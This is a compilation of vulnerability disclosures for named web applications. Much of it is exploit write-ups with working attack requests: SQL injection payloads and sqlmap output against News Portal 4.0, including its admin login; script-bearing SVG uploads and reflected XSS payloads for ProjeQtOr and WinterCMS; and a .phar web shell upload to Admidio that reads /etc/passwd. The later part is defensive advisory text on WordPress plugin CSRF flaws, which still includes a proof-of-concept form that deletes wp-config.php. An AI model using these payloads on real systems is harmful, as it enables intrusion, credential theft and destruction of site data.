News Portal version 4.0 suffers from a remote SQL injection vulnerability.

# Exploit Title: News Portal v4.0 - SQL Injection (Unauthorized)# Date: 09/07/2023# Exploit Author: Hubert Wojciechowski# Contact Author: hub.woj12345@gmail.com# Vendor Homepage: https://phpgurukul.com/news-portal-project-in-php-and-mysql/c# Software Link: https://phpgurukul.com/?sdm_process_download=1&download_id=7643# Version: 4.0# We are looking for work security engineer, security administrator: https://www.pracuj.pl/praca/security-engineer-warszawa-plocka-9-11,oferta,1002635314# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23## Example  1-----------------------------------------------------------------------------------------------------------------------Param: name, email, comment-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------POST /newsportal/news-details.php?nid=13 HTTP/1.1Origin: http://127.0.0.1Sec-Fetch-User: ?1Host: 127.0.0.1:80Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7Accept-Encoding: gzip, deflateSec-Fetch-Site: same-originsec-ch-ua-mobile: ?0Content-Length: 277Sec-Fetch-Mode: navigateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36Connection: closeReferer: http://127.0.0.1/newsportal/news-details.php?nid=13Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua-platform: "Windows"Cache-Control: max-age=0Content-Type: application/x-www-form-urlencodedsec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"Sec-Fetch-Dest: documentcsrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=(SELECT%20(CASE%20WHEN%20(8137%3d6474)%20THEN%200x73647361646173646173%20ELSE%20(SELECT%206474%20UNION%20SELECT%201005)%20END))''&email=admin%40local.host&comment=ssssssssssssssssssssssssss&submit-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sun, 09 Jul 2023 10:55:26 GMTServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17X-Powered-By: PHP/8.1.17Set-Cookie: PHPSESSID=l7dg3s1in50ojjigs4vm2p0r9s; path=/Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 146161<script>alert('comment successfully submit. Comment will be display after admin review ');</script><!DOCTYPE html><html lang="en">  <head>    <meta charset="utf-8">    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">    <meta name="description" content="">    <meta name="author" content="">    <title>News Portal | Home Page  [...]-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------POST /newsportal/news-details.php?nid=13 HTTP/1.1Origin: http://127.0.0.1Sec-Fetch-User: ?1Host: 127.0.0.1:80Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7Accept-Encoding: gzip, deflateSec-Fetch-Site: same-originsec-ch-ua-mobile: ?0Content-Length: 276Sec-Fetch-Mode: navigateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36Connection: closeReferer: http://127.0.0.1/newsportal/news-details.php?nid=13Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua-platform: "Windows"Cache-Control: max-age=0Content-Type: application/x-www-form-urlencodedsec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"Sec-Fetch-Dest: documentcsrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=(SELECT%20(CASE%20WHEN%20(8137%3d6474)%20THEN%200x73647361646173646173%20ELSE%20(SELECT%206474%20UNION%20SELECT%201005)%20END))'&email=admin%40local.host&comment=ssssssssssssssssssssssssss&submit-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sun, 09 Jul 2023 10:56:06 GMTServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17X-Powered-By: PHP/8.1.17Set-Cookie: PHPSESSID=fcju4nb9mr2tu80mqv5cnduldk; path=/Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 525Connection: closeContent-Type: text/html; charset=UTF-8<br /><b>Fatal error</b>:  Uncaught mysqli_sql_exception: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'admin@local.host','ssssssssssssssssssssssssss','0')' at line 1 in C:\xampp3\htdocs\newsportal\news-details.php:21Stack trace:#0 C:\xampp3\htdocs\newsportal\news-details.php(21): mysqli_query(Object(mysqli), 'insert into tbl...')#1 {main}  thrown in <b>C:\xampp3\htdocs\newsportal\news-details.php</b> on line <b>21</b><br />w-----------------------------------------------------------------------------------------------------------------------SQLMap example param 'comment':-----------------------------------------------------------------------------------------------------------------------sqlmap identified the following injection point(s) with a total of 450 HTTP(s) requests:---Parameter: #2* ((custom) POST)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause    Payload: csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=sdsadasdas&email=admin@local.host&comment=ssssssssssssssssssssssssss' RLIKE (SELECT (CASE WHEN (3649=3649) THEN 0x7373737373737373737373737373737373737373737373737373 ELSE 0x28 END)) AND 'xRsB'='xRsB&submit=    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=sdsadasdas&email=admin@local.host&comment=ssssssssssssssssssssssssss' OR (SELECT 6120 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(6120=6120,1))),0x7170717071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'odEK'='odEK&submit=    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=sdsadasdas&email=admin@local.host&comment=ssssssssssssssssssssssssss' AND (SELECT 1610 FROM (SELECT(SLEEP(5)))mZUx) AND 'bjco'='bjco&submit=---web application technology: PHP 8.1.17, Apache 2.4.56bacck-end DBMS: MySQL >= 5.0 (MariaDB fork)## Example 2 - login to administration panel-----------------------------------------------------------------------------------------------------------------------Param: username-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------POST /newsportal/admin/ HTTP/1.1Host: 127.0.0.1Content-Length: 42Cache-Control: max-age=0sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: http://127.0.0.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://127.0.0.1/newsportal/admin/Accept-Encoding: gzip, deflateAccept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7Cookie: USERSUB_TYPE=0; IS_MODERATOR=0; REPLY_SORT_ORDER=ASC; SHOWTIMELOG=Yes; user_uniq_agent=95e1b7d0ab9086d6b88e9adfaacf07d887164827a5708adf; SES_ROLE=3; USER_UNIQ=117b06da2ff9aabad1a916992e92bb26; USERTYP=3; USERTZ=33; helpdesk_uniq_agent=%7B%22temp_name%22%3A%22test%22%2C%22email%22%3A%22test%40local.host%22%7D; CPUID=8dba9a451f44121c45180df414ab6917; DEFAULT_PAGE=dashboard; CURRENT_FILTER=cases; currency=USD; phpsessid-9795-sid=s7b0dqlpebu74ls14j61e5q3be; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; WBCELastConnectJS=1688869781; PHPSESSID=2vag12caoqvv76avbeslm65je8Connection: closeusername=admin'&password=Test%40123&login=-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sun, 09 Jul 2023 11:00:53 GMTServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17X-Powered-By: PHP/8.1.17Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 505Connection: closeContent-Type: text/html; charset=UTF-8<br /><b>Fatal error</b>:  Uncaught mysqli_sql_exception: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'f925916e2754e5e03f75dd58a5733251')' at line 1 in C:\xampp3\htdocs\newsportal\admin\index.php:13Stack trace:#0 C:\xampp3\htdocs\newsportal\admin\index.php(13): mysqli_query(Object(mysqli), 'SELECT AdminUse...')#1 {main}  thrown in <b>C:\xampp3\htdocs\newsportal\admin\index.php</b> on line <b>13</b><br />-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------POST /newsportal/admin/ HTTP/1.1Host: 127.0.0.1Content-Length: 43Cache-Control: max-age=0sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: http://127.0.0.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://127.0.0.1/newsportal/admin/Accept-Encoding: gzip, deflateAccept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7Cookie: USERSUB_TYPE=0; IS_MODERATOR=0; REPLY_SORT_ORDER=ASC; SHOWTIMELOG=Yes; user_uniq_agent=95e1b7d0ab9086d6b88e9adfaacf07d887164827a5708adf; SES_ROLE=3; USER_UNIQ=117b06da2ff9aabad1a916992e92bb26; USERTYP=3; USERTZ=33; helpdesk_uniq_agent=%7B%22temp_name%22%3A%22test%22%2C%22email%22%3A%22test%40local.host%22%7D; CPUID=8dba9a451f44121c45180df414ab6917; DEFAULT_PAGE=dashboard; CURRENT_FILTER=cases; currency=USD; phpsessid-9795-sid=s7b0dqlpebu74ls14j61e5q3be; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; WBCELastConnectJS=1688869781; PHPSESSID=2vag12caoqvv76avbeslm65je8Connection: closeusername=admin''&password=Test%40123&login=-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sun, 09 Jul 2023 11:02:15 GMTServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17X-Powered-By: PHP/8.1.17Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 4733Connection: closeContent-Type: text/html; charset=UTF-8<script>alert('Invalid Details');</script><!DOCTYPE html><html lang="en">    <head>        <meta charset="utf-8">        <meta name="viewport" content="width=device-width, initial-scale=1.0">        <meta name="description" content="News Portal.">        <meta name="author" content="PHPGurukul">                <title>News Portal | Admin Panel</title>[...]

News Portal 4.0 SQL Injection

ProjeQtOr Project Management System version 10.4.1 suffers from multiple cross site scripting vulnerabilities.

    Exploit Title: ProjeQtOr Project Management System V10.4.1 - Multiple XSSVersion: V10.4.1Bugs:  Multiple XSSTechnology: PHPVendor URL: https://www.projeqtor.orgSoftware Link: https://sourceforge.net/projects/projectorria/files/projeqtorV10.4.1.zip/downloadDate of found: 09.07.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC                                     ### XSS-1 ### visit: http://localhost/projeqtor/view/refreshCronIconStatus.php?cronStatus=miri%27);%22%3E%3Cscript%3Ealert(4)%3C/script%3E&csrfToken=payload: miri%27);%22%3E%3Cscript%3Ealert(4)%3C/script%3E                                    ### XSS-2 ###steps: 1. login to account2. go projects and create project3.add attachment3. upload svg file"""<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>"""4. Go to  svg file ( http://localhost/projeqtor/files/attach/attachment_5/malas.svg )                                       ### XSS-3 ###Go to below adress (post request)POST /projeqtor/tool/ack.php?destinationWidth=50&destinationHeight=0&isIE=&xhrPostDestination=resultDivMain&xhrPostIsResultMessage=true&xhrPostValidationType=attachment&xhrPostTimestamp=1688898776311&csrfToken= HTTP/1.1Host: localhostContent-Length: 35sec-ch-ua: Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36sec-ch-ua-platform: ""Accept: */*Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/projeqtor/view/main.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=r5cjcsggl4j0oa9s70vchaklf3Connection: closeresultAck=<script>alert(4)</script>

ProjeQtOr Project Management System 10.4.1 Cross Site Scripting

WinterCMS versions prior to 1.2.3 suffer from a persistent cross site scripting vulnerability.

    # Exploit Title: WinterCMS < 1.2.3 - Persistent Cross-Site Scripting# Exploit Author: abhishek morla# Google Dork: N/A# Date: 2023-07-10# Vendor Homepage: https://wintercms.com/# Software Link: https://github.com/wintercms/winter# Version: 1.2.2# Tested on: windows64bit / mozila firefox # CVE : CVE-2023-37269# Report Link : https://github.com/wintercms/winter/security/advisories/GHSA-wjw2-4j7j-6gc3# Video POC : https://youtu.be/Dqhq8rdrcqcTitle : Application is Vulnerable to Persistent Cross-Site Scripting via SVG File Upload in Custom Logo Upload FunctionalityDescription :WinterCMS < 1.2.3 lacks restrictions on uploading SVG files as website logos, making it vulnerable to a Persistent cross-site scripting (XSS) attack. This vulnerability arises from the ability of an attacker to embed malicious JavaScript content within an SVG file, which remains visible to all users, including anonymous visitors. Consequently, any user interaction with the affected page can inadvertently trigger the execution of the malicious scriptPayload:- // image.svg<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.cookie);   </script></svg>//Post RequestPOST /backend/system/settings/update/winter/backend/branding HTTP/1.1Host: 172.17.0.2User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cacheX-Requested-With: XMLHttpRequestX-CSRF-TOKEN: fk93d30vmHCawwgMlTRy97vPOxaf4iPphtUwioc2X-WINTER-REQUEST-HANDLER: formLogo::onUploadContent-Type: multipart/form-data; boundary=---------------------------186411693022341939203410401206Content-Length: 608Origin: http://172.17.0.2Connection: closeCookie: admin_auth=eyJpdiI6IkV2dElCcWdsZStzWHc5cDVIcFZ1bnc9PSIsInZhbHVlIjoiVFkyV1k3UnBKUVNhSWF2NjVNclVCdXRwNklDQlFmenZXU2hUNi91T3c5aFRTTTR3VWQrVVJkZG5pcFZTTm1IMzFtZzkyWWpRV0FYRnJuZ1VoWXQ0Q2VUTGRScHhVcVRZdWtlSGYxa1kyZTh0RXVScFdySmF1VDZyZ1p0T1pYYWI5M1ZmVWtXUkhpeXg2U0l3NG9ZWHhnPT0iLCJtYWMiOiIyNzk0OTNlOWY2ODZhYjFhMGY0M2Y4Mzk0NjViY2FiOWQ0ZjNjMThlOTkxODZjYmFmNTZkZmY3MmZhMTM3YWJlIiwidGFnIjoiIn0%3D; BBLANG=en_US; winter_session=eyJpdiI6ImJFWHVEb0QrTmo5YjZYcml6Wm1jT3c9PSIsInZhbHVlIjoiQVdVZ3R4ajVUWUZXeS83dkhIQVFhVVYxOE1uajJQOVNzOUtwM1ZGcUFYOC9haHZFMlE2R0llNjZDWVR6eHZqbDZ5Z1J1akM5VkNaQUFZM1p5OGlZcjJFWTRaT21tRWdtcnJUUHJWRWg1QTZyRFhJbEdMc0h1SzZqaEphMFFSSDYiLCJtYWMiOiI0YzRkNWQwODVkMmI4ZmMxMTJlMGU5YjM2MWJkYjNiNjEwZmE2NTY4ZGQwYTdjNjAxMjRkMjRiN2M1NTBiOTNiIiwidGFnIjoiIn0%3D-----------------------------186411693022341939203410401206Content-Disposition: form-data; name="file_data"; filename="image.svg"Content-Type: image/svg+xml<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.domain);   </script></svg>-----------------------------186411693022341939203410401206--|-----------------------------------------EOF-----------------------------------------

WinterCMS 1.2.2 Cross Site Scripting

Admidio version 4.2.10 suffers from a remote code execution vulnerability.

    Exploit Title: Admidio v4.2.10 - Remote Code Execution (RCE)Application: AdmidioVersion: 4.2.10Bugs:  RCETechnology: PHPVendor URL: https://www.admidio.org/Software Link: https://www.admidio.org/download.phpDate of found: 10.07.2023Author: Mirabbas AğalarovTested on: Linux2. Technical Details & POC========================================Steps:1. Login to account2. Go to Announcements3. Add Entry4. Upload .phar file in image upload section..phar file Content<?php echo system('cat /etc/passwd');?>5. Visit .phar file  ( http://localhost/admidio/adm_my_files/announcements/images/20230710-172217_430o3e5ma5dnuvhp.phar )Request:POST /admidio/adm_program/system/ckeditor_upload_handler.php?CKEditor=ann_description&CKEditorFuncNum=1&langCode=en HTTP/1.1Host: localhostContent-Length: 378Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryne9TRuC1tAqhR86rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: http://localhost/admidio/adm_program/modules/announcements/announcements_new.php?headline=AnnouncementsAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ADMIDIO_admidio_adm_cookieconsent_status=dismiss; ADMIDIO_admidio_adm_SESSION_ID=penqrouatvh0vmp8v2mdntrgdn; ckCsrfToken=o3th5RcghWxx2qar157Xx4Y1f7FQ42ayQ9TaV8MBConnection: close------WebKitFormBoundaryne9TRuC1tAqhR86rContent-Disposition: form-data; name="upload"; filename="shell.phar"Content-Type: application/octet-stream<?php echo system('cat /etc/passwd');?>------WebKitFormBoundaryne9TRuC1tAqhR86rContent-Disposition: form-data; name="ckCsrfToken"o3th5RcghWxx2qar157Xx4Y1f7FQ42ayQ9TaV8MB------WebKitFormBoundaryne9TRuC1tAqhR86r--

Admidio 4.2.10 Remote Code Execution

The WooCommerce Google Sheet Connector WordPress plugin through 1.3.4 does not have CSRF check when updating its Access Code, which could allow attackers to make logged in admin change the access code to an arbitrary one via a CSRF attack

CVE-2023-2329

The Caldera Forms Google Sheets Connector WordPress plugin through 1.2 does not have CSRF check when updating its Access Code, which could allow attackers to make logged in admin change the access code to an arbitrary one via a CSRF attack

CVE-2023-2330

Cross-Site Request Forgery (CSRF) vulnerability in Ultimate Member plugin <= 2.6.0 versions.

**Solution**

 Fixed

Update the WordPress Ultimate Member plugin to the latest available version (at least 2.6.1).

Nguyen Xuan Chien discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress Ultimate Member Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. This vulnerability has been fixed in version 2.6.1.

**Other vulnerabilities in this plugin**

 0 present

 23 patched

View all

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-31216: WordPress Ultimate Member plugin <= 2.6.0 - Cross Site Request Forgery (CSRF) vulnerability - Patchstack

The POST SMTP Mailer WordPress plugin before 2.5.7 does not have proper CSRF checks in some AJAX actions, which could allow attackers to make logged in users with the manage_postman_smtp capability resend an email to an arbitrary address (for example a password reset email could be resent to an attacker controlled email, and allow them to take over an account).

CVE-2023-3179

The 3DPrint WordPress plugin before 3.5.6.9 does not protect against CSRF attacks in the modified version of Tiny File Manager included with the plugin, allowing an attacker to craft a malicious request that will create an archive of any files or directories on the target server by tricking a logged in admin into submitting a form. Furthermore the created archive has a predictable location and name, allowing the attacker to download the file if they know the time at which the form was submitted, making it possible to leak sensitive files like the WordPress configuration containing database credentials and secrets.

The premium version of the WordPress plugin 3DPrint is vulnerable to Cross Site Request Forgery (CSRF) and directory traversal attacks when the file manager functionality is enabled. These vulnerabilities allow an attacker to delete or get access to arbitrary files and directories on the affected sites, including sensitive files like the site configuration files, which again could lead to a full site takeover.

Recently, while looking over some potential false positives flagged by our experimental signatures, we discovered some code that puzzled us in the 3DPrint premium plugin.

require\_once("../../../../../../wp-load.php");
if ( !current\_user\_can('administrator') ) exit;
$p3d\_settings = get\_option( 'p3d\_settings' );

global $wpdb;

set\_time\_limit(0);
ini\_set( 'memory\_limit', '-1' );

This snippet was found in the Tiny File Manager PHP module located within the include directory of the plugin, but is not found in the original Tiny File Manager project. It seems to be injected with the intention to integrate it with the WordPress role-based access controls. 

Loading WordPress code files like this in an unrelated module is usually a sign that something is a bit off, so we decided to investigate further.

The observant reader will notice that access to the module is limited to users with the Administrator role, but there are no nonce checks. That would be ok if Tiny File Manager had its own CSRF protection, but as this was not the case, it looks like this code may be susceptible to a CSRF attack. (Tiny File Manager has since added CSRF protection after we made them aware of the issue. Version 2.5.0 and later should be a lot safer to use!)

A complicating factor is that Tiny File Manager is _not_ included in the package when installing 3DPrint premium but is downloaded on demand when activated. The version downloaded at the time of writing is version 2.4.4, but it has been heavily modified by the 3DPrint developers, and is downloaded from their domain, not directly from the Tiny File Manager repositories.

Most of the changes made remove functionality not used by the plugin, as well as a few other changes, like hard-coding the path, limiting what the file manager should be able to access. In addition, the authentication and authorization features built into Tiny File Manager have been disabled and replaced by the above integration with the WordPress role system.

We have discovered a couple of vulnerabilities where the combination of the modified access controls and inclusion of the Tiny File Manager in the 3DPrint plugin becomes exploitable to an outside attacker. This includes deleting or downloading sensitive files, potentially allowing for a full site takeover. These vulnerabilities exploit the lack of nonce checks in the modified access controls, along with directory traversal vulnerabilities in Tiny File Manager itself.

We have tried to contact the vendor of both the 3DPrint plugin and the Tiny File Manager project. Of these, only the developers of the Tiny File Manager project have responded to us and fixed the issues we submitted to them.

**Check out our new WAF as part of Jetpack Scan, which will protect against these attacks out of the box. It’s currently in beta. Jetpack Scan will also detect the vulnerable component, and help with removing it.**

As the Tiny File Manager module is downloaded and installed on demand, there’s not necessarily a correspondence between the plugin version and the version of Tiny File Manager being used. However, once installed, there does not seem to be an easy way to update the Tiny File Manager module apart from manually deleting it and activating it again.

For this reason, we consider all versions of 3DPrint to be vulnerable to the below vulnerabilities if the file manager has been activated.

**The vulnerabilities****1\. CSRF leading to arbitrary file/directory deletion**

*   Plugin: 3DPrint
*   Plugin slug: 3dprint
*   Plugin URI: http://www.wp3dprinting.com/2015/07/29/changelog/
*   Vulnerable versions: all
*   Fixed version: none
*   CVSS Score: 8.2 (High, CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:L)
*   CVE: CVE-2022-3899

The mass delete functionality in the included version of Tiny File Manager (version 2.4.4) is not properly protected against directory traversal and also lacks CSRF protections. This allows an attacker to trick an admin into deleting multiple files or even directories on the server recursively. 

// Mass deleting
if (isset($\_POST\['group'\], $\_POST\['delete'\]) && !FM\_READONLY) {
    $path = FM\_ROOT\_PATH;
    if (FM\_PATH != '') {
//        $path .= '/' . FM\_PATH;
    }

    $errors = 0;
    $files = $\_POST\['file'\];
    if (is\_array($files) && count($files)) {
        foreach ($files as $f) {
            if ($f != '') {
                $new\_path = $path . '/' . $f;
                if (!fm\_rdelete($new\_path)) {
                    $errors++;
                }
            }
        }
        if ($errors == 0) {
            fm\_set\_msg('Selected files and folder deleted');
        } else {
            fm\_set\_msg('Error while deleting items', 'error');
        }
    } else {
        fm\_set\_msg('Nothing selected', 'alert');
    }

    fm\_redirect(FM\_SELF\_URL . '?p=' . urlencode(FM\_PATH));
}

This can be exploited by passing the group and delete POST parameters to any value, and passing an array of files/directories to delete in the file parameter. The variable $new_path is a simple concatenation of the FM_ROOT_PATH and the passed in filename, passed to the recursive delete function fm_rdelete(). As fm_rdelete() does not do any validation of the pathnames it’s given, this makes this code vulnerable to a directory traversal attack.

Here’s an example proof of concept: 

<form action="https://example.com/wp-content/plugins/3dprint/includes/ext/tinyfilemanager/tinyfilemanager.php" method="POST">
    <input type="hidden" name="group" value="1">
    <input type="hidden" name="delete" value="1">
    <input type="hidden" name="file\[1\]" value="../2020">
    <input type="hidden" name="file\[2\]" value="../../../wp-config.php">
    <input type="submit" value="Get rich!">
</form>

All paths are relative to the wp-content/uploads/p3d/ directory on the server. When any logged-in admin clicks the button to get rich, their uploads from 2020 will be deleted along with the sites wp-config.php file. 

**2\. CSRF leading to arbitrary downloads**

*   Plugin: 3DPrint
*   Plugin slug: 3dprint
*   Plugin URI: http://www.wp3dprinting.com/2015/07/29/changelog/
*   Vulnerable versions: all
*   Fixed version: none
*   CVSS Score: 7.4 (High, CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N)
*   CVE: CVE-2022-4023

The functionality in the included version of Tiny File Manager (version 2.4.4) to download a zip or tar archive of selected files is not protected against directory traversal and lacks CSRF protections. This allows an attacker to trick an admin into creating a zip or tar archive with arbitrary files and directories from the site, including configuration files or other sensitive content.

The archive is placed in the normal 3DPring upload directory, wp-content/uploads/p3d/. The file name is only partially controllable by the attacker but is predictable enough that it should be relatively easy to brute force. If they know at what time the forged request was sent it should also be trivial to make an educated guess.

// Pack files
if (isset($\_POST\['group'\]) && (isset($\_POST\['zip'\]) || isset($\_POST\['tar'\])) && !FM\_READONLY) {
    $path = FM\_ROOT\_PATH;
    $ext = 'zip';
    if (FM\_PATH != '') {
//        $path .= '/' . FM\_PATH;
    }

    //set pack type
    $ext = isset($\_POST\['tar'\]) ? 'tar' : 'zip';

    $files = $\_POST\['file'\];
    if (!empty($files)) {
        chdir($path);

        if (count($files) == 1) {
            $one\_file = reset($files);
            $one\_file = basename($one\_file);
            $zipname = $one\_file . '\_' . date('ymd\_His') . '.'.$ext;
        } else {
            $zipname = 'archive\_' . date('ymd\_His') . '.'.$ext;
        }

        if($ext == 'zip') {
            $zipper = new FM\_Zipper();
            $res = $zipper->create($zipname, $files);
        } elseif ($ext == 'tar') {
            $tar = new FM\_Zipper\_Tar();
            $res = $tar->create($zipname, $files);
        }

